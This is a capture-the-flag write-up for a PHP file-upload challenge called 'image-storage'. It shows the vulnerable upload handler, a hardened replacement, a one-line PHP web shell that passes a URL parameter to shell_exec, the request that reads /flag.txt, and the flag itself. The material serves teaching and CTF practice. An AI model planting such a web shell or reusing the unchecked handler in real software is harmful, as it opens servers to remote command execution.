image-storage

Description

It is a file storage service written in PHP.

Use the file upload vulnerability to obtain the flag. The flag is located in /flag.txt

Attached

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>

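Analysis

The handler does not check the uploaded file's name, extension, or content, and it stores the file under ./uploads/ using the name the client supplied. A PHP script can therefore be uploaded and will be executed when it is requested from that directory.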
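For comparison, a hardened version of the same handler, added here as an example and not part of the original challenge or post. The storage path, the 2 MiB size cap and the image-only allowlist are assumptions.

```php
<?php
// Added example: hardened variant of the challenge's upload handler.
// Assumptions (not from the original): UPLOAD_DIR, MAX_BYTES and the ALLOWED list.
const UPLOAD_DIR = '/var/app/uploads/';   // assumed location outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('invalid upload');
    }
    // Decide the type from the file's bytes, not from the client-supplied
    // name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-generated name with a fixed extension: the client never controls
    // the stored name, so "exploit.php" or "../" sequences cannot reach the disk.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    try {
        // Reject a missing field and array-style (multi-file) submissions.
        if (!isset($_FILES['file']) || is_array($_FILES['file']['name'])) {
            throw new RuntimeException('no file');
        }
        echo 'Stored as: ' . store_upload($_FILES['file']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Error: ' . htmlspecialchars($e->getMessage());
    }
    die();
}
```

The content-type check on its own is not the control, since a file can carry valid image magic bytes and still contain PHP. What prevents execution is the server-chosen extension together with a storage directory that the web server does not serve or pass to the PHP interpreter.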

Solution

Upload the exploit.php file

<?php
echo shell_exec($_GET['command'])
?>

(See PHP shell_exec() vs exec())

Then request that file:

http://host3.dreamhack.games:17421/uploads/exploit.php?command=cat%20/flag.txt

The flag is

DH{c29f44ea17b29d8b76001f32e8997bab}
This post is licensed under CC BY 4.0 by the author.